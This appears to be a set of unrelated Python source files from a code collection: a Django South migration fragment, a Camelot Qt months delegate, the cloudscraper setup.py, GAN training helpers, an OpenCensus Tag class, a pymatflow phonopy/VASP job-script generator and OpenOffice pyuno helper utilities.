'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'bibtex': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reference': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '1000'}),
'year': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'survey.floatresponse': {
'Meta': {'object_name': 'FloatResponse', 'db_table': "'responses_floats'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.integerresponse': {
'Meta': {'object_name': 'IntegerResponse', 'db_table': "'responses_integers'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.optionquestion': {
'Meta': {'object_name': 'OptionQuestion', 'db_table': "'questions_option'", '_ormbases': [u'survey.Question']},
'options': ('django.db.models.fields.TextField', [], {}),
u'question_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Question']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.optionresponse': {
'Meta': {'object_name': 'OptionResponse', 'db_table': "'responses_options'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'}),
'response_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'survey.pages': {
'Meta': {'object_name': 'Pages'},
'associatedS': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Source']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pageNum': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
u'survey.question': {
'Meta': {'object_name': 'Question', 'db_table': "'questions'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'information': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_survey.question_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'question': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'response_type': ('django.db.models.fields.CharField', [], {'default': "'Int'", 'max_length': '6'}),
'section': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Section']"})
},
u'survey.response': {
'Meta': {'unique_together': "(('question', 'culture'),)", 'object_name': 'Response', 'db_table': "'responses'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'codersnotes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'culture': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Culture']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'missing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'new': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['survey.Pages']", 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_survey.response_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['survey.Question']"}),
'source': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'sources_info'", 'symmetrical': 'False', 'to': u"orm['core.Source']"}),
'uncertainty': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'survey.textresponse': {
'Meta': {'object_name': 'TextResponse', 'db_table': "'responses_texts'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['survey'] |
py | b41501f30e622415dda9117f380deb55ae6c22b8 | # ============================================================================
#
# Copyright (C) 2007-2016 Conceptive Engineering bvba.
# www.conceptive.be / [email protected]
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Conceptive Engineering nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ============================================================================
import six
from ....core.qt import Qt, variant_to_py
from camelot.view.controls.editors import MonthsEditor
from camelot.view.controls.delegates.customdelegate import CustomDelegate, DocumentationMetaclass
from camelot.core.utils import ugettext
from camelot.view.proxy import ValueLoading
@six.add_metaclass(DocumentationMetaclass)
class MonthsDelegate(CustomDelegate):
"""MonthsDelegate
custom delegate for showing and editing months and years
"""
editor = MonthsEditor
def __init__(self, parent=None, forever=200*12, **kwargs):
"""
:param forever: number of months that will be indicated as Forever, set
        to None if not applicable
"""
super(MonthsDelegate, self).__init__(parent=parent, **kwargs)
self._forever = forever
def sizeHint(self, option, index):
q = MonthsEditor(None)
return q.sizeHint()
def paint(self, painter, option, index):
painter.save()
self.drawBackground(painter, option, index)
value = variant_to_py( index.model().data( index, Qt.EditRole ) )
value_str = u''
if self._forever != None and value == self._forever:
value_str = ugettext('Forever')
elif value not in (None, ValueLoading):
years, months = divmod( value, 12 )
if years:
value_str = value_str + ugettext('%i years ')%(years)
if months:
value_str = value_str + ugettext('%i months')%(months)
self.paint_text(painter, option, index, value_str)
painter.restore()
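# Worked example of the formatting above (added note): with the default
# forever=200*12, a stored value equal to 200*12 paints as the translated
# "Forever", a value of 26 paints as "2 years 2 months", and 7 paints as
# "7 months".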
|
py | b41502059d6bd3f672b1585207e20e2dd3a834db | import os
import re
from setuptools import setup, find_packages
from io import open
with open(os.path.join(os.path.dirname(__file__), 'cloudscraper', '__init__.py')) as fp:
VERSION = re.match(r'.*__version__ = \'(.*?)\'', fp.read(), re.S).group(1)
with open('README.md', 'r', encoding='utf-8') as fp:
readme = fp.read()
setup(
name = 'cloudscraper',
author = 'VeNoMouS',
author_email = '[email protected]',
version=VERSION,
packages = find_packages(exclude=['tests*']),
description = 'A Python module to bypass Cloudflare\'s anti-bot page.',
long_description=readme,
long_description_content_type='text/markdown',
url = 'https://github.com/venomous/cloudscraper',
keywords = [
'cloudflare',
'scraping',
'ddos',
'scrape',
'webscraper',
'anti-bot',
'waf',
'iuam',
'bypass',
'challenge'
],
include_package_data = True,
install_requires = [
'requests >= 2.9.2',
'requests_toolbelt >= 0.9.1',
'pyparsing >= 2.4.7',
'aiohttp >= 3.7.3'
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
|
py | b41502660e7346ac0d606d60523b2b8294a597ab | # -*- coding: utf-8 -*-
# __author__ = "Lukas Racbhauer"
# __copyright__ = "2019, TU Wien, Department of Geodesy and Geoinformation"
# __license__ = "mit"
#
#
# from pkg_resources import get_distribution, DistributionNotFound
# from qa4sm_reader import ncplot
#
# __all__ = ['ncplot']
#
# try:
# # Change here if project is renamed and does not equal the package name
# dist_name = __name__
# __version__ = get_distribution(dist_name).__version
# except DistributionNotFound:
# __version__ = 'unknown'
# finally:
# del get_distribution, DistributionNotFound
#
|
py | b41502945ec62d51a9a0c72a751ff9caf3b08cc9 | from collections import defaultdict
from torch import autograd
import torch.nn.functional as F
import numpy as np
class BaseTrainer(object):
''' Base trainer class.
    Base class for trainers.
'''
def evaluate(self, *args, **kwargs):
''' Performs an evaluation.
'''
eval_list = defaultdict(list)
# for data in tqdm(val_loader):
eval_step_dict = self.eval_step()
for k, v in eval_step_dict.items():
eval_list[k].append(v)
# eval_dict = {k: v for k, v in eval_list.items()}
eval_dict = {k: np.mean(v) for k, v in eval_list.items()}
return eval_dict
def train_step(self, *args, **kwargs):
''' Performs a training step.
'''
raise NotImplementedError
def eval_step(self, *args, **kwargs):
''' Performs an evaluation step.
'''
raise NotImplementedError
def visualize(self, *args, **kwargs):
''' Performs visualization.
'''
raise NotImplementedError
def toggle_grad(model, requires_grad):
"""
    Enable or disable gradient tracking for all parameters of the given model.
"""
for p in model.parameters():
p.requires_grad_(requires_grad)
def compute_grad2(d_out, x_in):
"""
    Squared L2 norm of the gradient d(d_out)/d(x_in), summed per sample (gradient penalty term).
"""
batch_size = x_in.size(0)
grad_dout = autograd.grad(
outputs=d_out.sum(), inputs=x_in,
create_graph=True, retain_graph=True, only_inputs=True
)[0]
grad_dout2 = grad_dout.pow(2)
assert(grad_dout2.size() == x_in.size())
reg = grad_dout2.reshape(batch_size, -1).sum(1)
return reg
def update_average(model_tgt, model_src, beta):
    # Disable autograd for both models before copying parameters
toggle_grad(model_src, False)
toggle_grad(model_tgt, False)
param_dict_src = dict(model_src.named_parameters())
    # Blend the target model's parameters toward the source model's (exponential moving average)
for p_name, p_tgt in model_tgt.named_parameters():
p_src = param_dict_src[p_name]
assert(p_src is not p_tgt)
p_tgt.copy_(beta*p_tgt + (1. - beta)*p_src)
def compute_bce(d_out, target):
"""
    Compute the binary cross-entropy loss of d_out against a constant target label.
"""
targets = d_out.new_full(size=d_out.size(), fill_value=target)
loss = F.binary_cross_entropy_with_logits(d_out, targets)
return loss
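# Illustrative, self-contained usage sketch (added for clarity; not part of the
# original module). It exercises the helpers above with a toy linear
# "discriminator"; the tensor shapes, the R1 weight of 10.0 and the 0.999 EMA
# rate are arbitrary choices, not values taken from this project.
if __name__ == "__main__":
    import torch
    import torch.nn as nn

    discriminator = nn.Linear(4, 1)
    ema_discriminator = nn.Linear(4, 1)   # smoothed copy kept for evaluation

    x_real = torch.randn(8, 4, requires_grad=True)
    d_out = discriminator(x_real)

    loss = compute_bce(d_out, 1)                      # real samples -> target label 1
    r1_penalty = compute_grad2(d_out, x_real).mean()  # gradient penalty term
    (loss + 10.0 * r1_penalty).backward()

    update_average(ema_discriminator, discriminator, beta=0.999)
    toggle_grad(discriminator, True)   # update_average left requires_grad switched off
    print(float(loss), float(r1_penalty))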
|
py | b41503119b7015b6de8769b1071f16e475756c6a | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
Tag_ = namedtuple('Tag', ['key', 'value'])
class Tag(Tag_):
"""A tag, in the format [KEY]:[VALUE].
:type key: '~opencensus.tags.tag_key.TagKey'
:param key: Key in the tag
:type value: '~opencensus.tags.tag_key.TagValue'
:param value: Value of the key in the tag.
"""
pass
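# Illustrative example (added for clarity; not part of the original module):
# Tag is a plain namedtuple, so instances are built positionally or by keyword
# and unpack like a (key, value) pair. The strings below are arbitrary.
if __name__ == "__main__":
    deployment_tag = Tag("environment", "staging")
    print(deployment_tag.key, deployment_tag.value)  # -> environment staging
    key, value = deployment_tag                      # tuple unpacking also works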
|
py | b415032f91991274ffac422dc281e9969758823a | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
import numpy as np
import sys
import os
import shutil
from pymatflow.remote.server import server_handle
from pymatflow.vasp.vasp import Vasp
"""
Usage:
python phonon_with_phonopy_vasp.py xxx.xyz
xxx.xyz is the input structure file
    make sure the xyz structure file and the POTCAR are in the directory.
    make sure the elements in the POTCAR are listed in order of increasing
    atomic number (from the lowest atomic number to the highest).
Note:
    Reference: https://atztogo.github.io/phonopy/vasp.html
"""
class PhonopyRun(Vasp):
"""
"""
def __init__(self):
super().__init__()
self.incar.set_runtype(runtype="static")
self.supercell_n = [1, 1, 1]
def phonopy(self, directory="tmp-vasp-phonopy", runopt="gen", auto=0):
"""
directory: a place for all the generated files
"""
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile("POTCAR", os.path.join(directory, "POTCAR"))
os.system("cp %s %s/" % (self.poscar.xyz.file, directory))
# =======================================
# Constructing the input file for VASP
# =======================================
# ======================================
# Phonopy set up
# ======================================
# constructing the INCAR for the phonon calculation
self.incar.params["ISMEAR"] = 0
self.incar.params["SIGMA"] = 0.2
self.incar.params["IBRION"] = -1
self.incar.params["LWAVE"] = "F"
self.incar.params["LCHARG"] = "F"
#with open(os.path.join(directory, "INCAR"), 'w') as fout:
# self.incar.to_incar(fout)
with open(os.path.join(directory, "KPOINTS"), "w") as fout:
self.kpoints.to_kpoints(fout)
## Construct and run every POSCAR scf
with open(os.path.join(directory, "POSCAR"), 'w') as fout:
self.poscar.to_poscar(fout)
os.chdir(directory)
os.system("phonopy -d --dim='%d %d %d'" % (self.supercell_n[0], self.supercell_n[1], self.supercell_n[2]))
disps = self.get_disps("./")
for disp in disps:
os.mkdir("disp-%s" % (disp))
os.chdir("disp-%s" % (disp))
shutil.copyfile("../POSCAR-%s" % disp, "POSCAR")
#shutil.copyfile("../INCAR", "INCAR")
shutil.copyfile("../POTCAR", "POTCAR")
shutil.copyfile("../KPOINTS", "KPOINTS")
os.chdir("../")
os.chdir("../") # end of input generation chdir outside of the directory
# generate the llhpc script
with open(os.path.join(directory, "phonopy-job.slurm"), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s\n" % self.run_params["jobname"])
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("yhrun $PMF_VASP_STD\n")
fout.write("cd ../\n")
# generate the pbs script
with open(os.path.join(directory, "phonopy-job.pbs"), 'w') as fout:
fout.write("#!/bin/bash\n\n")
fout.write("#PBS -N %s\n" % self.run_params["jobname"])
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE -genv I_MPI_FABRICS shm:tmi %s\n" % ("$PMF_VASP_STD"))
fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
fout.write("cd ../\n")
# generate the local bash script
with open(os.path.join(directory, "phonopy-job.sh"), 'w') as fout:
fout.write("#!/bin/bash\n\n")
fout.write("\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("%s %s\n" % (self.run_params["mpi"], "$PMF_VASP_STD"))
fout.write("cd ../\n")
# generate lsf_sz bash script
            with open(os.path.join(directory, "phonopy-job.lsf_sz"), 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("APP_NAME=%s\n" % self.run_params["queue"])
                fout.write("NP=%d\n" % (self.run_params["nodes"] * self.run_params["ppn"]))  # total number of cores
fout.write("NP_PER_NODE=%d\n" % self.run_params["ppn"]) #np_per_node)
fout.write("RUN=\"RAW\"\n")
fout.write("CURDIR=$PWD\n")
fout.write("VASP=/home-yg/Soft/Vasp5.4/vasp_std\n")
fout.write("source /home-yg/env/intel-12.1.sh\n")
fout.write("source /home-yg/env/openmpi-1.6.5-intel.sh\n")
fout.write("cd $CURDIR\n")
fout.write("# starting creating ./nodelist\n")
fout.write("rm -rf $CURDIR/nodelist >& /dev/null\n")
fout.write("for i in `echo $LSB_HOSTS`\n")
fout.write("do\n")
fout.write(" echo \"$i\" >> $CURDIR/nodelist \n")
fout.write("done\n")
                fout.write("nodelist=$(cat $CURDIR/nodelist | uniq | awk \'{print $1}\' | tr \'\n\' \',\')\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("mpirun -np $NP -machinefile $CURDIR/nodelist $PMF_VASP_STD\n")
fout.write("cd ../\n")
# generate lsf_sustc bash script
with open(os.path.join(directory, "phonopy-job.lsf_sustc"), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#BSUB -J %s\n" % self.run_params["jobname"])
fout.write("#BSUB -q %s\n" % self.run_params["queue"])
fout.write("#BSUB -n %s\n" % (self.run_params["nodes"] * self.run_params["ppn"])) #number of total cores
fout.write("#BSUB -R \"span[ptile=%d]\"\n" % self.run_params["ppn"])
fout.write("hostfile=`echo $LSB_DJOB_HOSTFILE`\n")
fout.write("NP=`cat $hostfile | wc -l`\n")
fout.write("cd $LS_SUBCWD\n")
fout.write("cat > INCAR<<EOF\n")
self.incar.to_incar(fout)
fout.write("EOF\n")
for disp in disps:
fout.write("cd disp-%s\n" % disp)
fout.write("cp ../INCAR .\n")
fout.write("mpirun -machinefile $LSB_DJOB_HOSTFILE -np $NP $PMF_VASP_STD\n")
fout.write("cd ../\n")
# non-analytical term correction (optional)
            # See: https://atztogo.github.io/phonopy/vasp.html
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("bash phonopy-job.sh")
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="phonopy-job", server=self.run_params["server"])
def get_disps(self, directory="./"):
os.chdir(directory)
os.system("ls | grep 'POSCAR-' > pos.data")
disps = []
with open("pos.data", 'r') as fin:
for line in fin:
disps.append(line.split("\n")[0].split("-")[1])
return disps
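# Illustrative usage sketch (added for clarity; not part of the original
# module). The supercell size and directory are placeholders, and preparing
# the structure/POTCAR is assumed to be handled by the Vasp base class setup
# (not shown in this file).
#
#   calc = PhonopyRun()
#   calc.supercell_n = [2, 2, 2]   # generate displacements in a 2x2x2 supercell
#   calc.phonopy(directory="tmp-vasp-phonopy", runopt="gen", auto=0)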
|
py | b4150383e1df93bd3a097daa821c31318061bdfa | #**************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#**************************************************************
import uno
import pyuno
import os
import sys
from com.sun.star.lang import XTypeProvider, XSingleComponentFactory, XServiceInfo
from com.sun.star.uno import RuntimeException, XCurrentContext
from com.sun.star.beans.MethodConcept import ALL as METHOD_CONCEPT_ALL
from com.sun.star.beans.PropertyConcept import ALL as PROPERTY_CONCEPT_ALL
from com.sun.star.reflection.ParamMode import \
IN as PARAM_MODE_IN, \
OUT as PARAM_MODE_OUT, \
INOUT as PARAM_MODE_INOUT
from com.sun.star.beans.PropertyAttribute import \
MAYBEVOID as PROP_ATTR_MAYBEVOID, \
BOUND as PROP_ATTR_BOUND, \
CONSTRAINED as PROP_ATTR_CONSTRAINED, \
TRANSIENT as PROP_ATTR_TRANSIENT, \
READONLY as PROP_ATTR_READONLY, \
MAYBEAMBIGUOUS as PROP_ATTR_MAYBEAMBIGUOUS, \
MAYBEDEFAULT as PROP_ATTR_MAYBEDEFAULT, \
REMOVEABLE as PROP_ATTR_REMOVEABLE
def _mode_to_str( mode ):
ret = "[]"
if mode == PARAM_MODE_INOUT:
ret = "[inout]"
elif mode == PARAM_MODE_OUT:
ret = "[out]"
elif mode == PARAM_MODE_IN:
ret = "[in]"
return ret
def _propertymode_to_str( mode ):
ret = ""
if PROP_ATTR_REMOVEABLE & mode:
ret = ret + "removeable "
if PROP_ATTR_MAYBEDEFAULT & mode:
ret = ret + "maybedefault "
    if PROP_ATTR_MAYBEAMBIGUOUS & mode:
        ret = ret + "maybeambiguous "
if PROP_ATTR_READONLY & mode:
ret = ret + "readonly "
    if PROP_ATTR_TRANSIENT & mode:
        ret = ret + "transient "
if PROP_ATTR_CONSTRAINED & mode:
ret = ret + "constrained "
if PROP_ATTR_BOUND & mode:
ret = ret + "bound "
if PROP_ATTR_MAYBEVOID & mode:
ret = ret + "maybevoid "
return ret.rstrip()
def inspect( obj , out ):
if isinstance( obj, uno.Type ) or \
isinstance( obj, uno.Char ) or \
isinstance( obj, uno.Bool ) or \
isinstance( obj, uno.ByteSequence ) or \
isinstance( obj, uno.Enum ) or \
isinstance( obj, uno.Any ):
out.write( str(obj) + "\n")
return
ctx = uno.getComponentContext()
introspection = \
ctx.ServiceManager.createInstanceWithContext( "com.sun.star.beans.Introspection", ctx )
out.write( "Supported services:\n" )
if hasattr( obj, "getSupportedServiceNames" ):
names = obj.getSupportedServiceNames()
for ii in names:
out.write( " " + ii + "\n" )
else:
out.write( " unknown\n" )
out.write( "Interfaces:\n" )
if hasattr( obj, "getTypes" ):
interfaces = obj.getTypes()
for ii in interfaces:
out.write( " " + ii.typeName + "\n" )
else:
out.write( " unknown\n" )
access = introspection.inspect( obj )
methods = access.getMethods( METHOD_CONCEPT_ALL )
out.write( "Methods:\n" )
for ii in methods:
out.write( " " + ii.ReturnType.Name + " " + ii.Name )
args = ii.ParameterTypes
infos = ii.ParameterInfos
out.write( "( " )
for i in range( 0, len( args ) ):
if i > 0:
out.write( ", " )
out.write( _mode_to_str( infos[i].aMode ) + " " + args[i].Name + " " + infos[i].aName )
out.write( " )\n" )
props = access.getProperties( PROPERTY_CONCEPT_ALL )
out.write ("Properties:\n" )
for ii in props:
out.write( " ("+_propertymode_to_str( ii.Attributes ) + ") "+ii.Type.typeName+" "+ii.Name+ "\n" )
def createSingleServiceFactory( clazz, implementationName, serviceNames ):
return _FactoryHelper_( clazz, implementationName, serviceNames )
class _ImplementationHelperEntry:
def __init__(self, ctor,serviceNames):
self.ctor = ctor
self.serviceNames = serviceNames
class ImplementationHelper:
def __init__(self):
self.impls = {}
def addImplementation( self, ctor, implementationName, serviceNames ):
self.impls[implementationName] = _ImplementationHelperEntry(ctor,serviceNames)
def writeRegistryInfo( self, regKey, smgr ):
for i in list(self.impls.items()):
keyName = "/"+ i[0] + "/UNO/SERVICES"
key = regKey.createKey( keyName )
for serviceName in i[1].serviceNames:
key.createKey( serviceName )
return 1
def getComponentFactory( self, implementationName , regKey, smgr ):
entry = self.impls.get( implementationName, None )
if entry == None:
raise RuntimeException( implementationName + " is unknown" , None )
return createSingleServiceFactory( entry.ctor, implementationName, entry.serviceNames )
def getSupportedServiceNames( self, implementationName ):
entry = self.impls.get( implementationName, None )
if entry == None:
raise RuntimeException( implementationName + " is unknown" , None )
return entry.serviceNames
def supportsService( self, implementationName, serviceName ):
entry = self.impls.get( implementationName,None )
if entry == None:
raise RuntimeException( implementationName + " is unknown", None )
return serviceName in entry.serviceNames
class ImplementationEntry:
def __init__(self, implName, supportedServices, clazz ):
self.implName = implName
self.supportedServices = supportedServices
self.clazz = clazz
def writeRegistryInfoHelper( smgr, regKey, seqEntries ):
for entry in seqEntries:
keyName = "/"+ entry.implName + "/UNO/SERVICES"
key = regKey.createKey( keyName )
for serviceName in entry.supportedServices:
key.createKey( serviceName )
def systemPathToFileUrl( systemPath ):
"returns a file-url for the given system path"
return pyuno.systemPathToFileUrl( systemPath )
def fileUrlToSystemPath( url ):
"returns a system path (determined by the system, the python interpreter is running on)"
return pyuno.fileUrlToSystemPath( url )
def absolutize( path, relativeUrl ):
"returns an absolute file url from the given urls"
return pyuno.absolutize( path, relativeUrl )
def getComponentFactoryHelper( implementationName, smgr, regKey, seqEntries ):
for x in seqEntries:
if x.implName == implementationName:
return createSingleServiceFactory( x.clazz, implementationName, x.supportedServices )
def addComponentsToContext( toBeExtendedContext, contextRuntime, componentUrls, loaderName ):
smgr = contextRuntime.ServiceManager
loader = smgr.createInstanceWithContext( loaderName, contextRuntime )
implReg = smgr.createInstanceWithContext( "com.sun.star.registry.ImplementationRegistration",contextRuntime)
isWin = os.name == 'nt' or os.name == 'dos'
isMac = sys.platform == 'darwin'
# create a temporary registry
for componentUrl in componentUrls:
reg = smgr.createInstanceWithContext( "com.sun.star.registry.SimpleRegistry", contextRuntime )
reg.open( "", 0, 1 )
if not isWin and componentUrl.endswith( ".uno" ): # still allow platform independent naming
if isMac:
componentUrl = componentUrl + ".dylib"
else:
componentUrl = componentUrl + ".so"
implReg.registerImplementation( loaderName,componentUrl, reg )
rootKey = reg.getRootKey()
implementationKey = rootKey.openKey( "IMPLEMENTATIONS" )
implNames = implementationKey.getKeyNames()
extSMGR = toBeExtendedContext.ServiceManager
for x in implNames:
fac = loader.activate( max(x.split("/")),"",componentUrl,rootKey)
extSMGR.insert( fac )
reg.close()
# never shrinks !
_g_typeTable = {}
def _unohelper_getHandle( self):
ret = None
if self.__class__ in _g_typeTable:
ret = _g_typeTable[self.__class__]
else:
names = {}
traverse = list(self.__class__.__bases__)
while len( traverse ) > 0:
item = traverse.pop()
bases = item.__bases__
if uno.isInterface( item ):
names[item.__pyunointerface__] = None
elif len(bases) > 0:
# the "else if", because we only need the most derived interface
traverse = traverse + list(bases)#
lst = list(names.keys())
types = []
for x in lst:
t = uno.getTypeByName( x )
types.append( t )
ret = tuple(types) , uno.generateUuid()
_g_typeTable[self.__class__] = ret
return ret
class Base(XTypeProvider):
def getTypes( self ):
return _unohelper_getHandle( self )[0]
def getImplementationId(self):
return _unohelper_getHandle( self )[1]
class CurrentContext(XCurrentContext, Base ):
"""a current context implementation, which first does a lookup in the given
hashmap and if the key cannot be found, it delegates to the predecessor
if available
"""
def __init__( self, oldContext, hashMap ):
self.hashMap = hashMap
self.oldContext = oldContext
def getValueByName( self, name ):
if name in self.hashMap:
return self.hashMap[name]
elif self.oldContext != None:
return self.oldContext.getValueByName( name )
else:
return None
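# Illustrative sketch (added for clarity; not part of the original module):
# contexts can be chained, and getValueByName falls back to the older context
# when a key is missing locally. The keys and values below are arbitrary.
#
#   base = CurrentContext(None, {"user": "alice"})
#   child = CurrentContext(base, {"locale": "en-US"})
#   child.getValueByName("locale")    # -> "en-US" (found in child's own map)
#   child.getValueByName("user")      # -> "alice" (delegated to base)
#   child.getValueByName("missing")   # -> None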
